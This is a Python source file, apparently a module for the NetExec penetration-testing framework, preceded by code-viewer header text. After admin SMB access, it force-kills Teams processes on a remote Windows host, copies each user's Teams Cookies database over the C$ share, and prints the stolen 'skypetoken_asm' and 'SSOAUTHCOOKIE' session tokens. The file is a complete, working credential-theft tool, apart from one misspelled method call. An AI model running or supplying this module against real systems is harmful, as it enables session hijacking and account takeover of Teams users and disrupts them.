56 lines
2.3 KiB
Python
56 lines
2.3 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import sqlite3
|
|
|
|
|
|
class NXCModule:
|
|
name = "teams_localdb"
|
|
description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
|
|
supported_protocols = ["smb"]
|
|
opsec_safe = True
|
|
multiple_hosts = False
|
|
|
|
def options(self, context, module_options):
|
|
""" """
|
|
|
|
def on_admin_login(self, context, connection):
|
|
context.log.display("Killing all Teams process to open the cookie file")
|
|
connection.execute("taskkill /F /T /IM teams.exe")
|
|
# sleep(3)
|
|
found = 0
|
|
paths = connection.spider("C$", folder="Users", regex=["[a-zA-Z0-9]*"], depth=0)
|
|
with open("/tmp/teams_cookies2.txt", "wb") as f:
|
|
for path in paths:
|
|
try:
|
|
connection.conn.getFile("C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
|
|
context.log.highlight("Found Cookie file in path " + path)
|
|
found = 1
|
|
self.parse_file(context, "skypetoken_asm")
|
|
self.parse_file(context, "SSOAUTHCOOKIE")
|
|
f.seek(0)
|
|
f.trunkate()
|
|
except Exception as e:
|
|
if "STATUS_SHARING_VIOLATION" in str(e):
|
|
context.log.debug(str(e))
|
|
context.log.highlight("Found Cookie file in path " + path)
|
|
context.log.fail("Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database")
|
|
if found == 0:
|
|
context.log.display("No cookie file found in Users folder")
|
|
|
|
@staticmethod
|
|
def parse_file(context, name):
|
|
try:
|
|
conn = sqlite3.connect("/tmp/teams_cookies2.txt")
|
|
c = conn.cursor()
|
|
c.execute("SELECT value FROM cookies WHERE name = '" + name + "'")
|
|
row = c.fetchone()
|
|
if row is None:
|
|
context.log.fail("No " + name + " present in Microsoft Teams Cookies database")
|
|
else:
|
|
context.log.success("Succesfully extracted " + name + ": ")
|
|
context.log.success(row[0])
|
|
conn.close()
|
|
except Exception as e:
|
|
context.log.fail(str(e))
|